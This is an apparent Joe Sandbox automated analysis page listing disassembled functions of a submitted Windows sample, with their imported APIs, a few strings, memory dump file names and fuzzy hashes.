Part of subcall function 00007FF67418B090: ??Bid@locale@std@@QEAA_KXZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B0D7
Part of subcall function 00007FF67418B090: ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B109
Part of subcall function 00007FF67418B090: ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B134
Part of subcall function 00007FF67418B090: std::_Facet_Register.LIBCPMT ref: 00007FF67418B14D
Part of subcall function 00007FF67418B090: ??1_Lockit@std@@QEAA@XZ.MSVCP140(?,?,?,?,?,?,00000000,00007FF674189DBA), ref: 00007FF67418B16C

?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF674189DC0
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189DD7

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$Init@?$basic_streambuf@Lockit@std@@$??0_??1_?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@Bid@locale@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@_get_stream_buffer_pointersstd::_
String ID:
API String ID: 3911317180-0
Opcode ID: 6213a0e9a7a888f4411f4971676525eef9103ca148b99a3535e3b43de05aee0f
Instruction ID: 698c162264f7225caaf817b0b7db9058856d232fd270c4b39ede625660570c8b
Opcode Fuzzy Hash: 6213a0e9a7a888f4411f4971676525eef9103ca148b99a3535e3b43de05aee0f
Instruction Fuzzy Hash: 1E314D32629B85C2EB54EF25A48837977A8FB49F98F040135DA8D87B54DF3DD445C740

Function 00007FF674177040 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__std_fs_code_page.MSVCPRT ref: 00007FF67417709F

Part of subcall function 00007FF67418D9A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,00007FF6741770A4), ref: 00007FF67418D9A4
Part of subcall function 00007FF67418D9A0: AreFileApisANSI.KERNEL32(?,?,?,?,00007FF6741770A4), ref: 00007FF67418D9B3

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417721D

Part of subcall function 00007FF67418B570: memcpy.VCRUNTIME140(?,00000000,00000004,?,00007FF6741771EA), ref: 00007FF67418B652

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417726B

Strings

", ", xrefs: 00007FF67417718D
: ", xrefs: 00007FF67417715A

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ApisFile___lc_codepage_func__std_fs_code_pagememcpy
String ID: ", "$: "
API String ID: 2077005984-747220369
Opcode ID: 0d415203c43ebf0ecabdc822e5924af98a50cdb8722a42b5ae2175494e1faadf
Instruction ID: 6c57393a36fb671df892f2b8889d4a104d0afe8b03edd9ee807fc244a7c46276
Opcode Fuzzy Hash: 0d415203c43ebf0ecabdc822e5924af98a50cdb8722a42b5ae2175494e1faadf
Instruction Fuzzy Hash: 29618063B28B40C9EB00EF65D5883BD2366EB49B98F004535EE6D57B99DF38E151C380

Function 00007FF67415E9B0 Relevance: 8.8, APIs: 7, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67415EB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF67415E9D0), ref: 00007FF67415EB76
Part of subcall function 00007FF67415EB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF67415E9D0), ref: 00007FF67415EC19
Part of subcall function 00007FF67415EB20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF67415E9D0), ref: 00007FF67415EC42

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415E9EB
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EA0C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EA59
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EA89
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EAAE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EAD3
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415EAF4

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 8beb4a70d84814f3a84ad11d8969956394b205aa5d7a2c61af889b97717b44c7
Instruction ID: 3c4d665a73f97be3e68f29f5a0af6bf8d54dfd4755f47382ddc001ef248d70cd
Opcode Fuzzy Hash: 8beb4a70d84814f3a84ad11d8969956394b205aa5d7a2c61af889b97717b44c7
Instruction Fuzzy Hash: 2441E532A2AB82C6EA55AF65D49827877A0FF44F80F499535CA0DC3355EF3DE981CB40

Function 00007FF6741412A0 Relevance: 8.8, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA31
Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA5A
Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BA83
Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BAB8
Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BAE1
Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,00007FF6741412AE), ref: 00007FF67415BB10
Part of subcall function 00007FF67415BA00: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415BB94

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741412CD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741412F2
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674141314
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674141336
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674141358
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67414137A
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67414139C

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f5411cd00e002b590423fa21a25d72b24b8906f5c6ce1ce41fde82a80d96abb8
Instruction ID: c6ef0a9b19b00459cd3fdc5095f776b67319c75e38daaeeffcb136a6a0945c03
Opcode Fuzzy Hash: f5411cd00e002b590423fa21a25d72b24b8906f5c6ce1ce41fde82a80d96abb8
Instruction Fuzzy Hash: 95314922A2AB82C6FE95AF56D4CC73823A0FF45F85F295035C90DC3761DF2DA8408B50

Function 00007FF674141450 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 350COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF674142050: memset.VCRUNTIME140(?,?,?,00007FF674141489), ref: 00007FF67414213F

memset.VCRUNTIME140 ref: 00007FF6741418E4

Part of subcall function 00007FF6741610C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741610F0
Part of subcall function 00007FF6741610C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674161119
Part of subcall function 00007FF6741610C0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674161142

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741419C0
memset.VCRUNTIME140 ref: 00007FF674141C7C
memset.VCRUNTIME140 ref: 00007FF674141CAC

Strings

##Overlay, xrefs: 00007FF674141B99

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: memset$free$malloc
String ID: ##Overlay
API String ID: 1393892039-3248624929
Opcode ID: 2eaba876ed650407fe871e7cce812adf08c009d53d860509aa5007c2e7fa2f21
Instruction ID: ed589ea1f10d94be1e801b2f310a7cf1d646567de90fd8def47ddd0e22494de8
Opcode Fuzzy Hash: 2eaba876ed650407fe871e7cce812adf08c009d53d860509aa5007c2e7fa2f21
Instruction Fuzzy Hash: B222E272515BC1C9D310DF29E8841D877A8F745F68FAC433AEAA40B398DF34A1A1C768

Function 00007FF674153950 Relevance: 7.6, APIs: 6, Instructions: 82COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF67415398B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6741539CF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153A0B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153A30
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153A55
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF674153A7E

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 6e92a617e146b79cb6626d2bcae5c049687a4346ba48f715e49b937383dfd172
Instruction ID: 81cc9926496a40cb6bc1cce7f1a1ae4d8c23c29271468ef9eb3b05861c91b2d5
Opcode Fuzzy Hash: 6e92a617e146b79cb6626d2bcae5c049687a4346ba48f715e49b937383dfd172
Instruction Fuzzy Hash: 7B314733A2AA85C6FE95AF11D4882B867A0FF85F81F485535C90EC3764DF2DE480CB10

Function 00007FF6741894E0 Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF67418951B
??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF67418953A
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF67418956C
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189587
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF6741895D3

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Init@?$basic_streambuf@V?$basic_streambuf@
String ID:
API String ID: 1830095303-0
Opcode ID: ebc21684d6296c0a684840035bb16ef733088d37182bbdd14bbd2b4e156afb02
Instruction ID: 48cc619c929946a6f50138bd052314f7a11e978f01e4cd4c504ff2934fc7924c
Opcode Fuzzy Hash: ebc21684d6296c0a684840035bb16ef733088d37182bbdd14bbd2b4e156afb02
Instruction Fuzzy Hash: F9315673615B82C6EB50DF29EA9832D7BA4FB86B89F048131CA4D83724CF39D166C740

Function 00007FF674188770 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6741887A3
??0?$basic_istream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF6741887C2
??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF6741887F4
?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF67418880F

Part of subcall function 00007FF674189CE0: ?_Fiopen@std@@YAPEAU_iobuf@@PEBDHH@Z.MSVCP140 ref: 00007FF674189D1A
Part of subcall function 00007FF674189CE0: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF674189D37
Part of subcall function 00007FF674189CE0: _get_stream_buffer_pointers.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF674189D60
Part of subcall function 00007FF674189CE0: ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ.MSVCP140 ref: 00007FF674189DAB
Part of subcall function 00007FF674189CE0: ?always_noconv@codecvt_base@std@@QEBA_NXZ.MSVCP140 ref: 00007FF674189DC0

?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF67418885B

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$Init@?$basic_streambuf@$??0?$basic_ios@??0?$basic_istream@??0?$basic_streambuf@?always_noconv@codecvt_base@std@@?getloc@?$basic_streambuf@?setstate@?$basic_ios@D@std@@@1@_Fiopen@std@@U_iobuf@@V?$basic_streambuf@Vlocale@2@_get_stream_buffer_pointers
String ID:
API String ID: 2682282330-0
Opcode ID: 1f806dbc833b1be96441531daa2d869a703e86350570aac430166f2c19c06d70
Instruction ID: 514c640a48b935b704895674458ab2b99eb9ea884195d886b17bc10fc7bd0b17
Opcode Fuzzy Hash: 1f806dbc833b1be96441531daa2d869a703e86350570aac430166f2c19c06d70
Instruction Fuzzy Hash: D9212832618B81C6EB50DF25F89832A7BA4FB49B88F048135DA8E83B24CF3ED105C740

Function 00007FF674172530 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67418A030: DeviceIoControl.KERNEL32 ref: 00007FF67418A0E9

Part of subcall function 00007FF67418A130: DeviceIoControl.KERNEL32 ref: 00007FF67418A1E9

DeviceIoControl.KERNEL32 ref: 00007FF67417262E
DeviceIoControl.KERNEL32 ref: 00007FF6741726B0
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674172769

Strings

NPC, xrefs: 00007FF67417278B

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: ControlDevice$_invalid_parameter_noinfo_noreturn
String ID: NPC
API String ID: 2054765191-3492492454
Opcode ID: 1d1846f9ffca4b307175c9f2643c68ed5cb1b41a4df8cf64fe8c791ccb5bec0a
Instruction ID: 63661d866366567a1a4b32dcfb287232eb4ce24b96bf735b0595b4977ee7b960
Opcode Fuzzy Hash: 1d1846f9ffca4b307175c9f2643c68ed5cb1b41a4df8cf64fe8c791ccb5bec0a
Instruction Fuzzy Hash: D8619773B29781DAEB10DF64E4842AD33A0EB44BA8F408625EA5D87B98DF38D255C740

Function 00007FF674176B40 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF674176BB5

Part of subcall function 00007FF67418D9C8: MultiByteToWideChar.KERNEL32 ref: 00007FF67418D9E4
Part of subcall function 00007FF67418D9C8: GetLastError.KERNEL32 ref: 00007FF67418D9F2

__std_fs_convert_narrow_to_wide.LIBCPMT ref: 00007FF674176C61

Part of subcall function 00007FF67418B3B0: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,00000004,?,00007FF674177141), ref: 00007FF67418B4B3

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF674176D0B

Strings

Unknown exception, xrefs: 00007FF674176F77

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: __std_fs_convert_narrow_to_wide$ByteCharErrorLastMultiWide_invalid_parameter_noinfo_noreturnmemcpy
String ID: Unknown exception
API String ID: 882635279-410509341
Opcode ID: 3d69ea3ab618340370d6e28049371fd42f3692cda36b7f4400f3fb1210120398
Instruction ID: 1732665dca56f797f56c3c196e9d60fe07d22b863c839e1fdbc70bfaa051a302
Opcode Fuzzy Hash: 3d69ea3ab618340370d6e28049371fd42f3692cda36b7f4400f3fb1210120398
Instruction Fuzzy Hash: F941CCA2A28B86C5EB19AF26E58867D36A5EB48FD8F144031DE4D87745EF3CE491C340

Function 00007FF67417A3D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF67417A4BA
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF67417A4F5

Strings

Press Key, xrefs: 00007FF67417A45F
Select Key, xrefs: 00007FF67417A42A

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: CreateThread_invalid_parameter_noinfo_noreturn
String ID: Press Key$Select Key
API String ID: 2430190256-2074042277
Opcode ID: d51f657d3376c4c2540fc23bc878254aaa10134209f360cf4e1ccfa104575fbb
Instruction ID: b3a1e1bd988fdadcbcf550daaef8ead74041a1eb34751d5ca4e27d2553e291bf
Opcode Fuzzy Hash: d51f657d3376c4c2540fc23bc878254aaa10134209f360cf4e1ccfa104575fbb
Instruction Fuzzy Hash: AE31D363E3C682C1EB10EB14E4C837A6761EB857E4F145235EA9E86AD9DF2DD084C700

Function 00007FF674152E10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

ImmGetContext.IMM32 ref: 00007FF674152E49
ImmSetCompositionWindow.IMM32 ref: 00007FF674152E6F
ImmReleaseContext.IMM32 ref: 00007FF674152E7B

Strings

, xrefs: 00007FF674152E67

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

API ID: Context$CompositionReleaseWindow
String ID:
API String ID: 244372355-3916222277
Opcode ID: 080a81034cbf3d3149e6f6bc5fc97ca55129f1cc00b3034f962431ea279a0ee6
Instruction ID: 7986697a02d5902de607d6f25af5b5701b86192d54ad7d962b86de0a9346a382
Opcode Fuzzy Hash: 080a81034cbf3d3149e6f6bc5fc97ca55129f1cc00b3034f962431ea279a0ee6
Instruction Fuzzy Hash: 65012C37A19B81C6EA60AB16B999279B7A0FB8CBD4F084135DE8D87755EF3CD4448B00

Function 00007FF67414B87E Relevance: 6.5, APIs: 1, Strings: 3, Instructions: 474COMMON

Download Yara Rule

Strings

%.*s, xrefs: 00007FF67414C12E
#COLLAPSE, xrefs: 00007FF67414BC95
#CLOSE, xrefs: 00007FF67414BCFC

Memory Dump Source

Source File: 00000000.00000002.2542498542.00007FF674141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF674140000, based on PE: true

Associated: 00000000.00000002.2542438852.00007FF674140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542576864.00007FF674190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542612919.00007FF6741BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542637997.00007FF6741BF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542672801.00007FF6741D9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2542699645.00007FF6741DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff674140000_gh3zRWl4or.jbxd

Similarity

